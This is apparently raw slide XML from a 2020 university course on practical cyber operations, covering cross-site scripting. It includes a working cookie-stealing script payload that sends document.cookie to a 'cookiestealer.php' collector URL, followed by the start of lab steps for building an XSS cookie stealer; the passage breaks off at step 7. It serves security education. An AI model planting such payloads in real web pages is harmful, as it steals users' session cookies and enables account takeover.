              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>highjack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the user's browser and make the user visit and download </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>malware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Calibri" pitchFamily="34" charset="0"/>
              <a:buChar char="—"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>propagate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>a worm </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Calibri" pitchFamily="34" charset="0"/>
              <a:buChar char="—"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the user's browser as a temporary storage or for password  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>cracking, and more. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3286342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914400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0"/>
              <a:t>Cross-site scripting</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="1676400"/>
            <a:ext cx="7620000" cy="4800600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>XSS attacks exploit vulnerabilities caused by the lack of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0"/>
              <a:t>security controls </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>that the client browser places on data (such as cookies, dynamic content data, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>) that originate from a webserver site.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>XSS vulnerabilities are caused by the failure of a web application to validate client supplied data before returning it to the client system. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>These attacks can bypass the Document Object Model (DOM) security settings that are controlled by HTML tags.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"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26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2122586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990600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0"/>
              <a:t>Cross-site scripting</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76200" y="1066800"/>
            <a:ext cx="8534400" cy="5486400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For example, </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>a malicious code is embedded using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;script&gt; tags in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the message </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>       of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>a web server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hello!  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>script&gt; malicious code &lt;script &gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>then </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>when a client with enabled scripts in their browser reads the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>message the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>malicious code may be executed unexpectedly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>An </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>example of a (persistent) cookie stealing script (for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>applications             that do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>not sanitize input data) is the following</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="91440" indent="0">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>document.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=`</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>http://127.0.0.1/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>cookiestealer.php?c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=‘+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>;&lt;script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>which </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>will pass the escaped content of the cookie to a server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>at </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>`http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>127.0.0.1/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>cookiestealer.php?c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>='+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>YouTube demo: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Cross site scripting attacks (XSS), cookie session ID stealing </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" u="sng" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.youtube.com/watch?v=-H1qjiwQldw</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0">
              <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="DFDCB7"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CIS4930/CIS5930 Practical Cyber </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="DFDCB7"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Operstions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="DFDCB7"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Fundamentals 2020</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">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27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3522404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534400" cy="990600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>Write an XSS cookie stealer to steal passwords</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="1143000"/>
            <a:ext cx="8305800" cy="5867400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>To steal cookies, a cookie must be available on the web domain the user is viewing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>This happens whenever the user views the website.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Create an html test page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="754380" lvl="1" indent="-342900">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>mkdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> cookies</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="754380" lvl="1" indent="-342900">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>cd cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="411480" lvl="1" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>              move into this directory</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="754380" lvl="1" indent="-342900">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>touch index.html </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="411480" lvl="1" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="2400"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>              create an index file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="754380" lvl="1" indent="-342900">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="4"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>ano</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> index.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="411480" lvl="1" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>               </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>edit index.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="411480" lvl="1" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>              </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="754380" lvl="1" indent="-342900">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="5"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>If</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> you open browser page                                                                                                                        </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="411480" lvl="1" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>                         it will look blank</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="754380" lvl="1" indent="-342900">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="6"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Create a cookie </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="411480" lvl="1" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>must be inserted within the “body”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="411480" lvl="1" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>If the webpage is opened a cookie  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="411480" lvl="1" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>w</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>ill be set but nothing will be visible</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="DFDCB7"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CIS4930/CIS5930 Practical Cyber </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="DFDCB7"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Operstions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="DFDCB7"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Fundamentals 2020</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">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28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 2" descr="https://img.wonderhowto.com/img/original/31/29/63644955476501/0/6364495547650131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199" y="4114800"/>
            <a:ext cx="4415119" cy="14478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198" y="2590800"/>
            <a:ext cx="441511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244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762000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t>tealing a cookie</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-152400" y="1371600"/>
            <a:ext cx="8305800" cy="5791200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="754380" lvl="1" indent="-342900">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="3000"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="7"/>
            </a:pPr>
            <a:r>
